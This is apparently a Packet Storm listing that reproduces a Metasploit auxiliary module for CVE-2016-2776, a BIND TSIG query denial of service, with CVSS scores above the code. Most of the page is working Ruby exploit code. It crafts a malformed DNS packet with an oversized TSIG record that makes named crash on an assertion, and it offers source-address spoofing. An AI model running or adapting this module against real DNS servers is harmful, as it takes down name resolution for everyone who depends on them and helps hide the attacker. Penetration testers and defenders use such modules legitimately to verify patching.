Lucene search

Martin Rocha, Ezequiel Tavella, Alejandro Parodi, Infobyte Research Team, metasploit.comPACKETSTORM:180551

HistoryAug 31, 2024 - 12:00 a.m.

BIND TSIG Query Denial of Service

2024-08-3100:00:00

Martin Rocha, Ezequiel Tavella, Alejandro Parodi, Infobyte Research Team, metasploit.com

packetstormsecurity.com

dns

denial of service

query.

CVSS2

7.8

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:N/I:N/A:C

CVSS3

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

AI Score

7.1

Confidence

Low

JSON

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Capture  
include Msf::Auxiliary::UDPScanner  
include Msf::Auxiliary::Dos  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'BIND TSIG Query Denial of Service',  
'Description' => %q{  
A defect in the rendering of messages into packets can cause named to  
exit with an assertion failure in buffer.c while constructing a response  
to a query that meets certain criteria.  
  
This assertion can be triggered even if the apparent source address  
isn't allowed to make queries.  
},  
# Research and Original PoC - msf module author  
'Author' => [  
'Martin Rocha',  
'Ezequiel Tavella',  
'Alejandro Parodi',  
'Infobyte Research Team'  
],  
'References' => [  
['CVE', '2016-2776'],  
['URL', 'http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html']  
],  
'DisclosureDate' => '2016-09-27',  
'License' => MSF_LICENSE,  
'DefaultOptions' => {'ScannerRecvWindow' => 0}  
))  
  
register_options([  
Opt::RPORT(53),  
OptAddress.new('SRC_ADDR', [false, 'Source address to spoof'])  
])  
  
deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')  
end  
  
def scan_host(ip)  
if datastore['SRC_ADDR']  
scanner_spoof_send(payload, ip, rport, datastore['SRC_ADDR'])  
else  
print_status("Sending packet to #{ip}")  
scanner_send(payload, ip, rport)  
end  
end  
  
def payload  
query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65  
query << "\x00\x00" # Flags: 0x0000 Standard query  
query << "\x00\x01" # Questions: 1  
query << "\x00\x00" # Answer RRs: 0  
query << "\x00\x00" # Authority RRs: 0  
query << "\x00\x01" # Additional RRs: 1  
  
# Domain Name  
query << get_domain # Random DNS Name  
query << "\x00" # [End of name]  
query << "\x00\x01" # Type: A (Host Address) (1)  
query << "\x00\x01" # Class: IN (0x0001)  
  
# Additional records. Name  
query << ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes  
query << "\x3d"+Rex::Text.rand_text_alphanumeric(61)  
query << "\x00"  
  
query << "\x00\xfa" # Type: TSIG (Transaction Signature) (250)  
query << "\x00\xff" # Class: ANY (0x00ff)  
query << "\x00\x00\x00\x00" # Time to live: 0  
query << "\x00\xfc" # Data length: 252  
  
# Algorithm Name  
query << ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #Random 192 bytes  
query << "\x1A"+Rex::Text.rand_text_alphanumeric(26) #Random 26 bytes  
query << "\x00"  
  
# Rest of TSIG  
query << "\x00\x00"+Rex::Text.rand_text_alphanumeric(4) # Time Signed: Jan 1, 1970 03:15:07.000000000 ART  
query << "\x01\x2c" # Fudge: 300  
query << "\x00\x10" # MAC Size: 16  
query << Rex::Text.rand_text_alphanumeric(16) # MAC  
query << "\x8f\x65" # Original Id: 36709  
query << "\x00\x00" # Error: No error (0)  
query << "\x00\x00" # Other len: 0  
end  
  
def get_domain  
domain = "\x06"+Rex::Text.rand_text_alphanumeric(6)  
org = "\x03"+Rex::Text.rand_text_alphanumeric(3)  
domain+org  
end  
end  
`